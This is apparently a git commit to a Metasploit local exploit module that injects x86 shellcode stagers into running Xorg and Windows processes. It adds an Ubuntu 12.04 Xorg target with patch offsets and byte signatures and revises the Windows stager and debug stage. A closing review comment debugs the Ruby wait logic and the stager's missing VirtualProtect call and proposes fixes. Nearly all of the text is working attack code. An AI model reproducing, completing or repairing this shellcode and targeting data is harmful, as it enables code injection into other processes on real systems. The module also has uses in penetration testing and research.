added 12.04 Xorg

commit 403ed16851c9e3364ba469dc4e494b2dd940e419 1 parent 3394abb
dma authored
Showing with 21 additions and 8 deletions.
  1. +21 −8 module/mofo.rb
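--- a/module/mofo.rb
+++ b/module/mofo.rb
@@ -6,8 +6,7 @@ class Metasploit3 < Msf::Exploit::Local
 def initialize(info = {})
 linuxStager=
 "\xe8\x00\x00\x00\x00\x60\x31\xc0\xb0\xc0\x31\xdb\x31\xc9\xb5\x80\x99\xb2\x07\xbe\x22\x00\x00\x00\xcd\x80\xd1\xe9\x01\xc8\x66\xc7\x00\xff\xe0\xff\xe0"
-winStager=
-"\xe8\x00\x00\x00\x00\x60\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\xbe\x78\x56\x34\x12\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x66\xc7\x00\xff\xe0\xff\xe0"
+winStager="\xe8\x00\x00\x00\x00\x60\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\xbe\x00\x01\x00\x00\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x6a\x00\x6a\x40\x68\x00\x01\x00\x00\x50\x68\x10\xe1\x8a\xc3\x66\xc7\x00\xff\xe0\xff\xe0"
 winStage2 = { 'Patch' =>
 "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x31\xc0\x50\x50\x50\x8d\x9d\xa5\x00\x00\x00\x53\x50\x50\x68\x38\x68\x0d\x16\xff\xd5\x61\x83\x2c\x24\x05\xc3\x58",
 'Signature' => "\xff\xe0",
@@ -22,8 +21,8 @@ def initialize(info = {})
 'Payload' => true,
 }
 debugStage2 = { 'Patch' =>
-"",
-'Signature' => "\x90\x90\x90\x90\x90\x90\x90\x90",
+"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x31\xc0\x50\x50\x50\x8d\x9d\xa5\x00\x00\x00\x53\x50\x50\x68\x38\x68\x0d\x16\xff\xd5\x61\x83\x2c\x24\x05\xc3\x58",
+'Signature' => "\xff\xe0\x00\x00\x00\x00\x00\x00",
 'Offset' => 0,
 'Payload' => true,
 'Wait' => false,
@@ -54,14 +53,27 @@ def initialize(info = {})
 'Platform' => 'windows',
 'Arch' => ARCH_X86,
 'Stages' => [ {
-'Offset' => 0x312,
-'Signature' =>"\x55\x57\x56\x53\x83\xEC\x5C\x8B\x44\x24\x70\xE8\x47\xDC\xFA\xFF",
+'Offset' => 0x312,
+'Signature' =>"\x83\xf8\x10\x0f\x85\x50\x94\x00\x00\xb0\x01\x8b",
 'Space' => 2048,
 'Payload' => false,
 'Patch' => winStager,
 'Wait' => true,
 }, winStage2 ] }
 ],
+[ 'ubuntu 12.04 Xorg', #md5 880c4be57a8eef5c97a177347defb776
+{
+'Arch' => ARCH_X86,
+'Platform' => 'linux',
+'Stages' => [ {
+'Offset' => 0x1F5,
+'Signature'=>"\x85\xED\x0F\x8E\xC8\x02\x00\x00\x8B\x8B\x08\xFF\xFF\xFF\x8B\x41",
+'Patch' => linuxStager,
+'Space' => 2048,
+'Payload'=> false,
+'Wait' => 3,
+}, linuxStage2 ] }
+],
 [ 'ubuntu 11.10 Xorg',
 {
 'Arch' => ARCH_X86,
@@ -116,6 +128,8 @@ def initialize(info = {})
 'Stages' => [ linuxStage2 ] }
 ],
 [ 'debug', {
+'Arch' => ARCH_X86,
+'Platform' => 'windows',
 'Stages' => [ debugStage2 ] }
 ],
 ],
@@ -153,8 +167,7 @@ def exploit
 if stage['Wait'] == true
 puts 'Press enter if the current stage is run'
 gets
-end
-if stage['Wait'] >= 1
+elsif stage['Wait'] >= 1
 puts "sleeping for " + stage['Wait'].to_s + " seconds"
 sleep(stage['Wait'])
 end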
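Review bot: `elsif stage['Wait'] >= 1` still raises NoMethodError for a stage whose 'Wait' is `false` or unset, since neither `false` nor `nil` responds to `>=` — the `debug` target's debugStage2 sets `'Wait' => false` in the second hunk, so selecting that target would abort right here, and the elsif only fixes the `true` case that the old second `if` tripped on. Make the numeric branch conditional on the type, e.g. `elsif stage['Wait'].is_a?(Integer) && stage['Wait'] >= 1`. The enclosing `exploit` method starts before this hunk. Separately, the new winStager in the first hunk ends with five pushes after the VirtualAlloc call (`\x6a\x00\x6a\x40\x68\x00\x01\x00\x00\x50` and the hash `\x68\x10\xe1\x8a\xc3`, which looks like a VirtualProtect hash) but no `\xff\xd5` before the `mov word [eax],0xe0ff; jmp eax` spin, so that call never happens and esp is left 20 bytes below the pushad frame that the unchanged winStage2's closing `popad; sub [esp],5; ret` appears to unwind; either append `\xff\xd5` (and pass a real lpflOldProtect pointer rather than 0, which VirtualProtect rejects) or drop those 15 bytes.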